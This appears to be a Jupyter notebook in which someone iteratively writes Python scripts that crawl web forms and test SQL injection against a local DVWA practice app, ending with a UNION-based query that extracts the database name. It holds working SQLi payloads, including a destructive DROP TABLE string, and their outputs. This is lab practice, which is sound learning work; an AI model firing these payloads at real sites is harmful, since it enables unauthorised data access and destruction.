In [1]:
!pip install requests beautifulsoup4


In [2]:
import requests
from bs4 import BeautifulSoup


In [3]:
import requests
from bs4 import BeautifulSoup

def crawl_forms(url):
    """
    Crawls the given URL and extracts all HTML forms present on the page.

    Args:
        url (str): The URL of the webpage to crawl.

    Returns:
        list: A list of BeautifulSoup form objects found on the page.
    """
    try:
        response = requests.get(url)
        response.raise_for_status()  # Raise an error for bad status codes
    except requests.exceptions.RequestException as e:
        print(f"[!] Error fetching {url}: {e}")
        return []

    soup = BeautifulSoup(response.content, "html.parser")
    forms = soup.find_all("form")

    print(f"[+] Found {len(forms)} form(s) on {url}")
    return forms

def extract_form_details(form):
    """
    Extracts useful information from a form.

    Args:
        form (bs4.element.Tag): A BeautifulSoup form object.

    Returns:
        dict: A dictionary containing form action, method, and inputs.
    """
    action = form.get("action", "")
    method = form.get("method", "").upper()
    inputs = []

    # Find all input fields inside the form
    for input_tag in form.find_all("input"):
        input_info = {
            "type": input_tag.get("type", ""),
            "name": input_tag.get("name", ""),
            "value": input_tag.get("value", "")
        }
        inputs.append(input_info)

    form_details = {
        "action": action,
        "method": method,
        "inputs": inputs
    }

    return form_details

# ---- Main Program ----
url = input("Enter the URL to crawl for forms: ").strip()

forms = crawl_forms(url)

# Extract and print information about each form
for i, form in enumerate(forms, start=1):
    print(f"\nForm #{i} Details:")
    form_details = extract_form_details(form)

    print(f"Action: {form_details['action']}")
    print(f"Method: {form_details['method']}")

    print("Inputs:")
    for input_info in form_details["inputs"]:
        print(f"  Type: {input_info['type']}, Name: {input_info['name']}, Value: {input_info['value']}")


Enter the URL to crawl for forms:  http://localhost


[+] Found 1 form(s) on http://localhost

Form #1 Details:
Action: login.php
Method: POST
Inputs:
  Type: text, Name: username, Value: 
  Type: password, Name: password, Value: 
  Type: submit, Name: Login, Value: Login
  Type: hidden, Name: user_token, Value: 20a9df40e276bd8e78e698df88c39a64


In [18]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

def extract_forms(url):
    """
    Extract all forms from the given URL.
    Returns a list of form objects.
    """
    response = requests.get(url, timeout=10)
    soup = BeautifulSoup(response.text, "html.parser")
    
    # Find all form elements on the page
    forms = soup.find_all("form")
    
    # List to store form details
    form_details = []
    
    for form in forms:
        details = {}
        details["action"] = form.get("action")
        details["method"] = form.get("method", "get").lower()
        details["inputs"] = []
        
        # Collect all input elements inside the form
        for input_tag in form.find_all("input"):
            input_details = {
                "name": input_tag.get("name"),
                "type": input_tag.get("type", "text"),
                "value": input_tag.get("value", "")
            }
            details["inputs"].append(input_details)
        
        form_details.append(details)
    
    return form_details

def test_sqli(url, form):
    """
    Test SQL Injection on a specific form.
    """
    # Extract the form action URL and ensure it's a full URL
    form_action = form.get("action")
    form_url = urljoin(url, form_action)
    
    # Prepare the payloads for testing
    payloads = [
        "' OR 1=1 --"              # Basic SQLi payload
        # "' OR 'a'='a",               # Always true condition
        # "' OR 1=1#",                 # SQL comment to terminate query
        # "' UNION SELECT NULL, NULL, NULL --"  # Union-based SQLi
    ]
    
    for payload in payloads:
        form_data = {}
        csrf_token = None
        
        # Look for a hidden CSRF token and the regular form inputs
        for input_tag in form["inputs"]:
            input_name = input_tag["name"]
            if input_name == "user_token":  # CSRF token field
                csrf_token = input_tag["value"]
            elif input_name:
                form_data[input_name] = payload  # Use payload for testing
        
        # Include CSRF token in the form data if found
        if csrf_token:
            form_data["user_token"] = csrf_token
        
        print(f"[*] Testing payload: {payload} on {form_url}")
        
        # Send the request based on the form method
        try:
            if form.get("method") == "post":
                response = requests.post(form_url, data=form_data, timeout=10)
            else:
                response = requests.get(form_url, params=form_data, timeout=10)
            
            print(f"Response code: {response.status_code}")
            
            # Check if the response contains any SQL error messages or unusual patterns
            if "error" in response.text.lower() or "sql" in response.text.lower():
                print("[+] Potential SQLi vulnerability detected!")
            elif "Welcome" in response.text or "Dashboard" in response.text:
                print("[+] Logged in or unexpected page behavior!")
            else:
                print("[-] No obvious signs of SQLi, but check manually.")
            
            # Optionally, print part of the response to visually inspect
            print(response.text[:500])  # Show only the first 500 characters
            
        except requests.exceptions.RequestException as e:
            print(f"Error while sending request: {e}")

def main():
    url = input("Enter the URL to crawl for forms: ")
    forms = extract_forms(url)
    
    print(f"[+] Found {len(forms)} form(s) on {url}")
    
    for i, form in enumerate(forms, 1):
        print(f"\nForm #{i} Details:")
        print(f"Action: {form['action']}")
        print(f"Method: {form['method']}")
        for input_tag in form["inputs"]:
            print(f"Input Name: {input_tag['name']}, Type: {input_tag['type']}, Value: {input_tag['value']}")
        
        # Test for SQL Injection on this form
        test_sqli(url, form)

if __name__ == "__main__":
    main()


Enter the URL to crawl for forms:  http://localhost


[+] Found 1 form(s) on http://localhost

Form #1 Details:
Action: login.php
Method: post
Input Name: username, Type: text, Value: 
Input Name: password, Type: password, Value: 
Input Name: Login, Type: submit, Value: Login
Input Name: user_token, Type: hidden, Value: bbf950507355bd0bebca92461ab4f2b2
[*] Testing payload: ' OR 1=1 -- on http://localhost/login.php
Response code: 200
[-] No obvious signs of SQLi, but check manually.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

	<head>

		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

		<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>

		<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />

	</head>

	<body>

	<div id="wrapper">

	<div id="header">

	<br />

	<p><img src


In [20]:
import requests
from urllib.parse import urlparse, urljoin
from bs4 import BeautifulSoup

# Function to get all forms on the target URL
def get_forms(url):
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'html.parser')
    forms = soup.find_all('form')
    form_details = []
    
    for form in forms:
        details = {}
        details['action'] = form.get('action')
        details['method'] = form.get('method', 'get').lower()
        inputs = []
        
        for input_tag in form.find_all('input'):
            input_details = {
                'name': input_tag.get('name'),
                'type': input_tag.get('type', 'text')
            }
            inputs.append(input_details)
        
        details['inputs'] = inputs
        form_details.append(details)
    
    return form_details
def test_sqli_vulnerability(url, form, payloads):
    # Prepare data for the form submission
    data = {}
    for input_tag in form['inputs']:
        if input_tag['type'] == 'submit':
            continue
        data[input_tag['name']] = payloads.get(input_tag['name'], '')

    # Construct the full URL to post the data to
    action_url = urljoin(url, form['action'])

    # Post the form data with the payloads
    if form['method'] == 'post':
        response = requests.post(action_url, data=data)
    else:
        response = requests.get(action_url, params=data)

    # Check for typical SQLi signs in the response
    if response.status_code == 200:
        # Check for common SQL error signs
        error_keywords = ["error", "Warning", "mysql", "syntax", "database", "SQL"]
        if any(keyword in response.text for keyword in error_keywords):
            return True
        # You can also check for unexpected responses (e.g., a login success page with injected payload)
        if "login successful" in response.text.lower():  # Replace with a message in your app for success
            return True
    return False


# Function to scan the website for forms and test each one for SQLi
def scan_for_sqli(url):
    # Define some common SQLi payloads
    payloads = {
        'username': "' OR 1=1 --",
        'password': "' OR 1=1 --"
    }

    forms = get_forms(url)
    for form in forms:
        print(f"Testing form with action: {form['action']}")
        if test_sqli_vulnerability(url, form, payloads):
            print(f"[+] SQL Injection vulnerability found on form at {form['action']}")
        else:
            print(f"[-] No obvious signs of SQL Injection on form at {form['action']}")
    
if __name__ == "__main__":
    target_url = input("Enter the URL to crawl for forms: ")
    scan_for_sqli(target_url)


Enter the URL to crawl for forms:  http://localhost


Testing form with action: login.php
[-] No obvious signs of SQL Injection on form at login.php


In [22]:
import requests
from bs4 import BeautifulSoup

# Function to test for SQL injection vulnerability
def test_sql_injection(base_url, action, payloads, form_data):
    print(f"Testing SQL injection on {base_url}{action}")
    for payload in payloads:
        # Add payload to form data
        data = form_data.copy()
        data['username'] = payload  # Inject payload into the username field
        data['password'] = payload  # Inject payload into the password field

        print(f"\n[*] Testing payload: {payload}")
        
        try:
            # Construct the full URL for the form action
            full_url = base_url + action if action.startswith('/') else base_url + '/' + action
            
            response = requests.post(full_url, data=data)

            if response.status_code == 200:
                # If the response status is 200, check if there's a hint of success
                if "ID" in response.text and "admin" in response.text:
                    print("[+] SQL Injection successful! The payload seems to work.")
                    print(f"Response contains: {response.text[:500]}...")  # Print part of the response for debugging
                else:
                    print("[-] No obvious SQLi signs, continue testing with other payloads.")
            else:
                print(f"[-] Received non-200 status code: {response.status_code}")
        
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")

# Function to crawl the website and extract form data
def crawl_forms(url):
    print(f"[*] Crawling {url} for forms...")
    response = requests.get(url)
    soup = BeautifulSoup(response.text, "html.parser")

    forms = soup.find_all("form")
    form_details = []

    for form in forms:
        action = form.get("action", "")
        method = form.get("method", "get").lower()

        # Get input fields
        inputs = form.find_all("input")
        form_inputs = {}
        for input_tag in inputs:
            input_name = input_tag.get("name")
            input_type = input_tag.get("type", "text")
            form_inputs[input_name] = {"type": input_type}

        form_details.append({"action": action, "method": method, "inputs": form_inputs})
    
    print(f"[+] Found {len(forms)} form(s) on {url}")
    return form_details

def main():
    url = input("Enter the URL to crawl for forms: ")
    payloads = [
        "' OR 1=1 --",
        "' OR '1'='1",
        "' OR 'a'='a",
        "' UNION SELECT null, null, null --",
        "'; DROP TABLE users --"
    ]
    
    # Crawl the website for forms
    forms = crawl_forms(url)

    # Now test each form found
    for form in forms:
        action_url = form['action']
        method = form['method']
        inputs = form['inputs']
        form_data = {key: "" for key in inputs.keys()}

        print(f"\n[*] Testing form at {action_url} with method {method.upper()}")

        # Test for SQL injection on this form
        test_sql_injection(url, action_url, payloads, form_data)

if __name__ == "__main__":
    main()


Enter the URL to crawl for forms:  http://localhost


[*] Crawling http://localhost for forms...
[+] Found 1 form(s) on http://localhost

[*] Testing form at login.php with method POST
Testing SQL injection on http://localhostlogin.php

[*] Testing payload: ' OR 1=1 --
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: ' OR '1'='1
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: ' OR 'a'='a
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: ' UNION SELECT null, null, null --
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: '; DROP TABLE users --
[-] No obvious SQLi signs, continue testing with other payloads.


In [24]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin  # Used to handle URL concatenation

# Function to test for SQL injection vulnerability
def test_sql_injection(base_url, action, payloads, form_data):
    print(f"Testing SQL injection on {base_url}{action}")
    for payload in payloads:
        # Add payload to form data
        data = form_data.copy()
        data['username'] = payload  # Inject payload into the username field
        data['password'] = payload  # Inject payload into the password field

        print(f"\n[*] Testing payload: {payload}")
        
        try:
            # Ensure the full URL is correct using urljoin
            full_url = urljoin(base_url, action)  # Combines the base_url and action correctly
            
            response = requests.post(full_url, data=data)

            if response.status_code == 200:
                # If the response status is 200, check if there's a hint of success
                if "ID" in response.text and "admin" in response.text:
                    print("[+] SQL Injection successful! The payload seems to work.")
                    print(f"Response contains: {response.text[:500]}...")  # Print part of the response for debugging
                else:
                    print("[-] No obvious SQLi signs, continue testing with other payloads.")
            else:
                print(f"[-] Received non-200 status code: {response.status_code}")
        
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")

# Function to crawl the website and extract form data
def crawl_forms(url):
    print(f"[*] Crawling {url} for forms...")
    response = requests.get(url)
    soup = BeautifulSoup(response.text, "html.parser")

    forms = soup.find_all("form")
    form_details = []

    for form in forms:
        action = form.get("action", "")
        method = form.get("method", "get").lower()

        # Get input fields
        inputs = form.find_all("input")
        form_inputs = {}
        for input_tag in inputs:
            input_name = input_tag.get("name")
            input_type = input_tag.get("type", "text")
            form_inputs[input_name] = {"type": input_type}

        form_details.append({"action": action, "method": method, "inputs": form_inputs})
    
    print(f"[+] Found {len(forms)} form(s) on {url}")
    return form_details

def main():
    url = input("Enter the URL to crawl for forms: ")
    payloads = [
        "' OR 1=1 --",
        "' OR '1'='1",
        "' OR 'a'='a",
        "' UNION SELECT null, null, null --",
        "'; DROP TABLE users --"
    ]
    
    # Crawl the website for forms
    forms = crawl_forms(url)

    # Now test each form found
    for form in forms:
        action_url = form['action']
        method = form['method']
        inputs = form['inputs']
        form_data = {key: "" for key in inputs.keys()}

        print(f"\n[*] Testing form at {action_url} with method {method.upper()}")

        # Test for SQL injection on this form
        test_sql_injection(url, action_url, payloads, form_data)

if __name__ == "__main__":
    main()


Enter the URL to crawl for forms:  http://localhost


[*] Crawling http://localhost for forms...
[+] Found 1 form(s) on http://localhost

[*] Testing form at login.php with method POST
Testing SQL injection on http://localhostlogin.php

[*] Testing payload: ' OR 1=1 --
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: ' OR '1'='1
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: ' OR 'a'='a
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: ' UNION SELECT null, null, null --
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: '; DROP TABLE users --
[-] No obvious SQLi signs, continue testing with other payloads.


In [30]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

# Function to test for SQL injection vulnerability
def test_sql_injection(base_url, action, payloads, form_data, method, session):
    print(f"Testing SQL injection on {urljoin(base_url, action)}")  # Show the full URL for testing
    for payload in payloads:
        # Add payload to form data
        data = form_data.copy()
        data['username'] = payload  # Inject payload into the username field
        data['password'] = payload  # Inject payload into the password field

        print(f"\n[*] Testing payload: {payload}")
        
        try:
            # Combine base_url and action URL correctly
            full_url = urljoin(base_url, action)
            
            # Send request depending on the form method
            if method == "post":
                response = session.post(full_url, data=data)
            elif method == "get":
                response = session.get(full_url, params=data)

            if response.status_code == 200:
                # Check for signs of a successful injection (this can vary by the target)
                if "Login failed" not in response.text and "Welcome" in response.text:  # On success, you'll likely see "Welcome" message
                    print("[+] SQL Injection successful! The payload seems to work.")
                    print(f"Response contains: {response.text[:500]}...")  # Print part of the response for debugging
                else:
                    print("[-] No obvious SQLi signs, continue testing with other payloads.")
            else:
                print(f"[-] Received non-200 status code: {response.status_code}")
        
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")

# Function to crawl the website and extract form data
def crawl_forms(url, session):
    print(f"[*] Crawling {url} for forms...")
    response = session.get(url)
    soup = BeautifulSoup(response.text, "html.parser")

    forms = soup.find_all("form")
    form_details = []

    for form in forms:
        action = form.get("action", "")
        method = form.get("method", "get").lower()

        # Get input fields
        inputs = form.find_all("input")
        form_inputs = {}
        for input_tag in inputs:
            input_name = input_tag.get("name")
            input_type = input_tag.get("type", "text")
            form_inputs[input_name] = {"type": input_type}

        form_details.append({"action": action, "method": method, "inputs": form_inputs})
    
    print(f"[+] Found {len(forms)} form(s) on {url}")
    return form_details

def main():
    # Use the local URL where DVWA is hosted
    url = input("Enter the URL to crawl for forms (e.g., http://localhost/DVWA): ")
    
    # Set of payloads to test for SQL Injection
    payloads = [
        "' OR 1=1 --",
        "' OR '1'='1",
        "' OR 'a'='a",
        "' UNION SELECT null, null, null --",
        "'; DROP TABLE users --"
    ]
    
    # Create a session object
    session = requests.Session()

    # First, login to DVWA (you may need to adjust credentials for your setup)
    login_url = urljoin(url, "login.php")
    login_data = {'username': 'admin', 'password': 'password', 'Login': 'Login'}  # Modify with your DVWA credentials
    login_response = session.post(login_url, data=login_data)

    # Check if login was successful by looking for a redirect to index.php
    if login_response.status_code == 200:
        if login_response.history and login_response.history[0].status_code == 302 and 'index.php' in login_response.history[0].headers['Location']:
            print("[+] Login successful, redirected to index.php!")
        else:
            print("[!] Login failed or no redirect to index.php. Check your credentials.")
            return

        # Crawl the website for forms
        forms = crawl_forms(url, session)

        # Now test each form found
        for form in forms:
            action_url = form['action']
            method = form['method']
            inputs = form['inputs']
            form_data = {key: "" for key in inputs.keys()}  # Empty data dictionary to inject payloads

            print(f"\n[*] Testing form at {action_url} with method {method.upper()}")

            # Test for SQL injection on this form
            test_sql_injection(url, action_url, payloads, form_data, method, session)
    else:
        print("[!] Login failed. Check your credentials and try again.")

if __name__ == "__main__":
    main()


Enter the URL to crawl for forms (e.g., http://localhost/DVWA):  http://localhost/login.php


[!] Login failed or no redirect to index.php. Check your credentials.


In [34]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

# Function to test for SQL injection vulnerability
def test_sql_injection(base_url, action, payloads, form_data):
    print(f"Testing SQL injection on {urljoin(base_url, action)}")  # Show the full URL for testing
    for payload in payloads:
        # Add payload to form data
        data = form_data.copy()
        data['UserID'] = payload  # Inject payload into the UserID field

        print(f"\n[*] Testing payload: {payload}")
        
        try:
            # Use the correct URL if action is #
            full_url = urljoin(base_url, action) if action != "#" else base_url  # Use base URL if action is #

            response = requests.post(full_url, data=data)

            if response.status_code == 200:
                # If the response status is 200, check if there's a hint of success
                if "ID" in response.text and "admin" in response.text:
                    print("[+] SQL Injection successful! The payload seems to work.")
                    print(f"Response contains: {response.text[:500]}...")  # Print part of the response for debugging
                else:
                    print("[-] No obvious SQLi signs, continue testing with other payloads.")
            else:
                print(f"[-] Received non-200 status code: {response.status_code}")
        
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")

# Function to crawl the website and extract form data
def crawl_forms(url):
    print(f"[*] Crawling {url} for forms...")
    response = requests.get(url)
    soup = BeautifulSoup(response.text, "html.parser")

    forms = soup.find_all("form")
    form_details = []

    for form in forms:
        action = form.get("action", "#")  # Default to '#' if no action is specified
        method = form.get("method", "get").lower()

        # Get input fields
        inputs = form.find_all("input")
        form_inputs = {}
        for input_tag in inputs:
            input_name = input_tag.get("name")
            input_type = input_tag.get("type", "text")
            form_inputs[input_name] = {"type": input_type}

        form_details.append({"action": action, "method": method, "inputs": form_inputs})
    
    print(f"[+] Found {len(forms)} form(s) on {url}")
    return form_details

def main():
    url = input("Enter the URL to crawl for forms: ")
    payloads = [
        "' OR 1=1 --",
        "' OR '1'='1",
        "' OR 'a'='a",
        "' UNION SELECT null, null, null --",
        "'; DROP TABLE users --"
    ]
    
    # Crawl the website for forms
    forms = crawl_forms(url)

    # Now test each form found
    for form in forms:
        action_url = form['action']
        method = form['method']
        inputs = form['inputs']
        form_data = {key: "" for key in inputs.keys()}

        print(f"\n[*] Testing form at {action_url} with method {method.upper()}")

        # Test for SQL injection on this form
        test_sql_injection(url, action_url, payloads, form_data)

if __name__ == "__main__":
    main()


Enter the URL to crawl for forms:  http://localhost/vulnerabilities/sqli/


[*] Crawling http://localhost/vulnerabilities/sqli/ for forms...
[+] Found 1 form(s) on http://localhost/vulnerabilities/sqli/

[*] Testing form at login.php with method POST
Testing SQL injection on http://localhost/vulnerabilities/sqli/login.php

[*] Testing payload: ' OR 1=1 --
[-] Received non-200 status code: 404

[*] Testing payload: ' OR '1'='1
[-] Received non-200 status code: 404

[*] Testing payload: ' OR 'a'='a
[-] Received non-200 status code: 404

[*] Testing payload: ' UNION SELECT null, null, null --
[-] Received non-200 status code: 404

[*] Testing payload: '; DROP TABLE users --
[-] Received non-200 status code: 404


In [36]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

# Function to test for SQL injection vulnerability
def test_sql_injection(base_url, action, payloads, form_data):
    print(f"Testing SQL injection on {urljoin(base_url, action)}")  # Show the full URL for testing
    
    # If the form action is "#", we use the base URL
    if action == "#":
        full_url = base_url
    else:
        full_url = urljoin(base_url, action)  # Handle the action URL correctly

    for payload in payloads:
        # Add payload to form data
        data = form_data.copy()
        data['UserID'] = payload  # Inject payload into the UserID field

        print(f"\n[*] Testing payload: {payload}")
        
        try:
            # Send the POST request
            response = requests.post(full_url, data=data)

            if response.status_code == 200:
                # If the response status is 200, check if there's a hint of success
                if "ID" in response.text and "admin" in response.text:
                    print("[+] SQL Injection successful! The payload seems to work.")
                    print(f"Response contains: {response.text[:500]}...")  # Print part of the response for debugging
                else:
                    print("[-] No obvious SQLi signs, continue testing with other payloads.")
            else:
                print(f"[-] Received non-200 status code: {response.status_code}")
        
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")

# Function to crawl the website and extract form data
def crawl_forms(url):
    print(f"[*] Crawling {url} for forms...")
    response = requests.get(url)
    soup = BeautifulSoup(response.text, "html.parser")

    forms = soup.find_all("form")
    form_details = []

    for form in forms:
        action = form.get("action", "#")  # Default to '#' if no action is specified
        method = form.get("method", "get").lower()

        # Get input fields
        inputs = form.find_all("input")
        form_inputs = {}
        for input_tag in inputs:
            input_name = input_tag.get("name")
            input_type = input_tag.get("type", "text")
            form_inputs[input_name] = {"type": input_type}

        form_details.append({"action": action, "method": method, "inputs": form_inputs})
    
    print(f"[+] Found {len(forms)} form(s) on {url}")
    return form_details

def main():
    url = input("Enter the URL to crawl for forms: ")
    payloads = [
        "' OR 1=1 --",
        "' OR '1'='1",
        "' OR 'a'='a",
        "' UNION SELECT null, null, null --",
        "'; DROP TABLE users --"
    ]
    
    # Crawl the website for forms
    forms = crawl_forms(url)

    # Now test each form found
    for form in forms:
        action_url = form['action']
        method = form['method']
        inputs = form['inputs']
        form_data = {key: "" for key in inputs.keys()}

        print(f"\n[*] Testing form at {action_url} with method {method.upper()}")

        # Test for SQL injection on this form
        test_sql_injection(url, action_url, payloads, form_data)

if __name__ == "__main__":
    main()


Enter the URL to crawl for forms:   http://localhost/vulnerabilities/sqli/


[*] Crawling  http://localhost/vulnerabilities/sqli/ for forms...
[+] Found 1 form(s) on  http://localhost/vulnerabilities/sqli/

[*] Testing form at login.php with method POST
Testing SQL injection on http://localhost/vulnerabilities/sqli/login.php

[*] Testing payload: ' OR 1=1 --
[-] Received non-200 status code: 404

[*] Testing payload: ' OR '1'='1
[-] Received non-200 status code: 404

[*] Testing payload: ' OR 'a'='a
[-] Received non-200 status code: 404

[*] Testing payload: ' UNION SELECT null, null, null --
[-] Received non-200 status code: 404

[*] Testing payload: '; DROP TABLE users --
[-] Received non-200 status code: 404


In [38]:
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

# Function to test for SQL injection vulnerability
def test_sql_injection(base_url, action, payloads, form_data):
    print(f"Testing SQL injection on {urljoin(base_url, action)}")

    # If the form action is "#" (current page), we use the base URL
    if action == "#":
        full_url = base_url
    else:
        full_url = urljoin(base_url, action)  # Correctly handle action URLs
    
    for payload in payloads:
        # Add payload to form data
        data = form_data.copy()
        data['UserID'] = payload  # Inject payload into the UserID field

        print(f"\n[*] Testing payload: {payload}")
        
        try:
            # Send the POST request
            response = requests.post(full_url, data=data)

            if response.status_code == 200:
                # If the response status is 200, check if there's a hint of success
                if "ID" in response.text and "admin" in response.text:
                    print("[+] SQL Injection successful! The payload seems to work.")
                    print(f"Response contains: {response.text[:500]}...")  # Print part of the response for debugging
                else:
                    print("[-] No obvious SQLi signs, continue testing with other payloads.")
            else:
                print(f"[-] Received non-200 status code: {response.status_code}")
        
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")

# Function to crawl the website and extract form data
def crawl_forms(url):
    print(f"[*] Crawling {url} for forms...")
    response = requests.get(url)
    soup = BeautifulSoup(response.text, "html.parser")

    forms = soup.find_all("form")
    form_details = []

    for form in forms:
        action = form.get("action", "#")  # Default to '#' if no action is specified
        method = form.get("method", "get").lower()

        # Get input fields
        inputs = form.find_all("input")
        form_inputs = {}
        for input_tag in inputs:
            input_name = input_tag.get("name")
            input_type = input_tag.get("type", "text")
            form_inputs[input_name] = {"type": input_type}

        form_details.append({"action": action, "method": method, "inputs": form_inputs})
    
    print(f"[+] Found {len(forms)} form(s) on {url}")
    return form_details

def main():
    url = input("Enter the URL to crawl for forms: ")
    payloads = [
        "' OR 1=1 --",
        "' OR '1'='1",
        "' OR 'a'='a",
        "' UNION SELECT null, null, null --",
        "'; DROP TABLE users --"
    ]
    
    # Crawl the website for forms
    forms = crawl_forms(url)

    # Now test each form found
    for form in forms:
        action_url = form['action']
        method = form['method']
        inputs = form['inputs']
        form_data = {key: "" for key in inputs.keys()}

        print(f"\n[*] Testing form at {action_url} with method {method.upper()}")

        # Test for SQL injection on this form
        test_sql_injection(url, action_url, payloads, form_data)

if __name__ == "__main__":
    main()


Enter the URL to crawl for forms:   http://localhost/vulnerabilities/sqli/


[*] Crawling  http://localhost/vulnerabilities/sqli/ for forms...
[+] Found 1 form(s) on  http://localhost/vulnerabilities/sqli/

[*] Testing form at login.php with method POST
Testing SQL injection on http://localhost/vulnerabilities/sqli/login.php

[*] Testing payload: ' OR 1=1 --
[-] Received non-200 status code: 404

[*] Testing payload: ' OR '1'='1
[-] Received non-200 status code: 404

[*] Testing payload: ' OR 'a'='a
[-] Received non-200 status code: 404

[*] Testing payload: ' UNION SELECT null, null, null --
[-] Received non-200 status code: 404

[*] Testing payload: '; DROP TABLE users --
[-] Received non-200 status code: 404


In [41]:
import requests
from urllib.parse import urljoin

# Function to test for SQL injection vulnerability
def test_sql_injection(base_url, action, payloads):
    print(f"Testing SQL injection on {urljoin(base_url, action)}")

    # If the form action is "#" (current page), we use the base URL
    if action == "#":
        full_url = base_url  # Post to the same URL (base URL)
    else:
        full_url = urljoin(base_url, action)  # Correctly handle action URLs

    for payload in payloads:
        # Prepare the URL with the payload in the `id` parameter
        test_url = f"{full_url}?id={payload}"

        print(f"\n[*] Testing payload: {payload}")
        
        try:
            # Send GET request with the payload appended to the URL
            response = requests.get(test_url)
            
            if response.status_code == 200:
                # If the response status is 200, check if there's a hint of success
                if "ID" in response.text and "admin" in response.text:
                    print("[+] SQL Injection successful! The payload seems to work.")
                    print(f"Response contains: {response.text[:500]}...")  # Print part of the response for debugging
                else:
                    print("[-] No obvious SQLi signs, continue testing with other payloads.")
            else:
                print(f"[-] Received non-200 status code: {response.status_code}")
        
        except requests.exceptions.RequestException as e:
            print(f"[!] Request failed: {e}")

# Function to crawl the website and extract form data
def crawl_forms(url):
    print(f"[*] Crawling {url} for forms...")
    response = requests.get(url)

    # Check if the response is valid
    if response.status_code != 200:
        print(f"[!] Failed to fetch the page. Status code: {response.status_code}")
        return []

    # Get the form action and method from the form tag
    form_action = '#'
    return [{'action': form_action, 'method': 'GET'}]

def main():
    url = input("Enter the URL to crawl for forms: ")
    payloads = [
        "' OR 1=1 --",
        "' OR '1'='1",
        "' OR 'a'='a",
        "' UNION SELECT null, null, null --",
        "'; DROP TABLE users --"
    ]
    
    # Crawl the website for forms
    forms = crawl_forms(url)

    # Now test each form found
    for form in forms:
        action_url = form['action']
        method = form['method']
        
        print(f"\n[*] Testing form at {url} with method {method.upper()}")

        # Test for SQL injection on this form
        test_sql_injection(url, action_url, payloads)

if __name__ == "__main__":
    main()


Enter the URL to crawl for forms:   http://localhost/vulnerabilities/sqli/


[*] Crawling  http://localhost/vulnerabilities/sqli/ for forms...

[*] Testing form at  http://localhost/vulnerabilities/sqli/ with method GET
Testing SQL injection on http://localhost/vulnerabilities/sqli/

[*] Testing payload: ' OR 1=1 --
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: ' OR '1'='1
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: ' OR 'a'='a
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: ' UNION SELECT null, null, null --
[-] No obvious SQLi signs, continue testing with other payloads.

[*] Testing payload: '; DROP TABLE users --
[-] No obvious SQLi signs, continue testing with other payloads.


In [ ]:
na9uvrf9ktsnnboe83ik8mjru0

In [51]:
import requests

# DVWA URL for SQL Injection
url ="http://localhost/vulnerabilities/sqli/" 

# Set your session cookies (important for DVWA login and security level)
cookies = {
    'PHPSESSID': 'na9uvrf9ktsnnboe83ik8mjru0',  # replace with your actual PHPSESSID
    'security': 'low',  # make sure DVWA security is set to 'low' or 'medium' if testing
}

# Common SQLi payload to test
payload = "' OR '1'='1"

# Parameters
params = {
    'id': payload,
    'Submit': 'Submit'
}

# Send the request
response = requests.get(url, params=params, cookies=cookies)

# Check if "Welcome" or user data is displayed
if "First name" in response.text and "Surname" in response.text:
    print("[+] Potential SQL Injection vulnerability detected!")
else:
    print("[-] No obvious SQL Injection vulnerability detected.")

# Optional: Print a snippet of response
print(response.text[:500])  # print first 500 characters


[+] Potential SQL Injection vulnerability detected!

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

	<head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

		<title>Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>

		<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />

		<link rel="icon" type="\image/ico" href="../../favicon.ico" />


In [52]:
import requests

url = "http://localhost/vulnerabilities/sqli/"

cookies = {
    'PHPSESSID': 'na9uvrf9ktsnnboe83ik8mjru0',  # your session id
    'security': 'low',
}

# SQL Injection payload to extract database name
payload = "1' UNION SELECT null, database() -- -"

params = {
    'id': payload,
    'Submit': 'Submit'
}

response = requests.get(url, params=params, cookies=cookies)

# Check and print results
if "First name" in response.text and "Surname" in response.text:
    print("[+] Data extraction possible!")
    start = response.text.find("First name")
    print(response.text[start:start+300])  # print part of page where data appears
else:
    print("[-] Could not extract database name.")


[+] Data extraction possible!
First name: admin<br />Surname: admin</pre><pre>ID: 1' UNION SELECT null, database() -- -<br />First name: <br />Surname: dvwa</pre>
	</div>

	<h2>More Information</h2>
	<ul>
		<li><a href="http://www.securiteam.com/securityreviews/5DP0N1P76E.html" target="_blank">http://www.securiteam.com/secu


In [54]:
import requests

url = "http://localhost/vulnerabilities/sqli/"

cookies = {
    'PHPSESSID': 'na9uvrf9ktsnnboe83ik8mjru0',  # your session id
    'security': 'low',
}

# SQL Injection payload to extract database name
